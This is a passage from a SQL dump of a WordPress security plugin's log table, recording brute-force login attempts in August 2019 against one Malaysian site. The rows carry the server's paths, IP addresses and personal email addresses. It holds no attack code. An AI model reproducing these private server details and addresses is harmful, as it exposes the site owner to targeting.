empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"139.59.79.94\";s:11:\"REMOTE_PORT\";s:5:\"59280\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVH@c-brxCl71gpwvAPzgAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566918649.323\";s:12:\"REQUEST_TIME\";s:10:\"1566918649\";}}','notice','2019-08-27 15:10:50','2019-08-27 15:10:49',18200544,19498080,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.79.94'),(23460,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"23.91.70.8\";s:11:\"REMOTE_PORT\";s:5:\"22096\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVNv4ir4pgxiIHnHK5MgQAAAcQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566920127.748\";s:12:\"REQUEST_TIME\";s:10:\"1566920127\";}}','notice','2019-08-27 15:35:28','2019-08-27 15:35:28',17684448,19175528,'https://bintara.com.my/wp-login.php',1,0,'23.91.70.8'),(23461,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"23.91.70.8\";s:11:\"REMOTE_PORT\";s:5:\"22302\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVNws-brxCl71gpwvAUcwAAAE0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566920130.5614\";s:12:\"REQUEST_TIME\";s:10:\"1566920130\";}}','notice','2019-08-27 15:35:32','2019-08-27 15:35:31',18200568,19498216,'https://bintara.com.my/xmlrpc.php',1,0,'23.91.70.8'),(23462,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.134.230.199\";s:11:\"REMOTE_PORT\";s:5:\"60006\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVO1Yir4pgxiIHnHK5MqAAAAdM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566920406.0403\";s:12:\"REQUEST_TIME\";s:10:\"1566920406\";}}','notice','2019-08-27 15:40:07','2019-08-27 15:40:06',17686368,19176944,'https://bintara.com.my/wp-login.php',1,0,'91.134.230.199'),(23463,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.134.230.199\";s:11:\"REMOTE_PORT\";s:5:\"60670\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVO2WXkG1atThADMYG4MwAAANI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566920409.2746\";s:12:\"REQUEST_TIME\";s:10:\"1566920409\";}}','notice','2019-08-27 15:40:10','2019-08-27 15:40:09',18198000,19495464,'https://bintara.com.my/xmlrpc.php',1,0,'91.134.230.199'),(23464,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.222.34\";s:11:\"REMOTE_PORT\";s:5:\"57822\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVQsc-brxCl71gpwvAWMwAAAEU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566920882.1001\";s:12:\"REQUEST_TIME\";s:10:\"1566920882\";}}','notice','2019-08-27 15:48:03','2019-08-27 15:48:02',18199944,19499480,'https://bintara.com.my/xmlrpc.php',1,0,'167.71.222.34'),(23465,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"210.245.8.110\";s:11:\"REMOTE_PORT\";s:5:\"58624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVS7GXkG1atThADMYG4sQAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566921452.1549\";s:12:\"REQUEST_TIME\";s:10:\"1566921452\";}}','notice','2019-08-27 15:57:33','2019-08-27 15:57:32',17685008,19175760,'https://bintara.com.my/wp-login.php',1,0,'210.245.8.110'),(23466,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"210.245.8.110\";s:11:\"REMOTE_PORT\";s:5:\"58900\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVS7s-brxCl71gpwvAXewAAAEk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566921454.4223\";s:12:\"REQUEST_TIME\";s:10:\"1566921454\";}}','notice','2019-08-27 15:57:35','2019-08-27 15:57:34',18198936,19495088,'https://bintara.com.my/xmlrpc.php',1,0,'210.245.8.110'),(23467,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.104.28.127\";s:11:\"REMOTE_PORT\";s:5:\"56458\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWVW2M-brxCl71gpwvAZPQAAAE8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566922457.0494\";s:12:\"REQUEST_TIME\";s:10:\"1566922457\";}}','notice','2019-08-27 16:14:18','2019-08-27 16:14:17',17683368,19174640,'https://bintara.com.my/wp-login.php',1,0,'185.104.28.127'),(23468,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-08-27 18:57:12','2019-08-27 18:57:08',17732624,18195264,'http://www.bintara.com.my/',1,0,'185.192.69.22'),(23469,0,'notification_center','send::backup','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:33:\"[bintara.com.my/] Database Backup\";}','debug','2019-08-28 03:29:01','2019-08-28 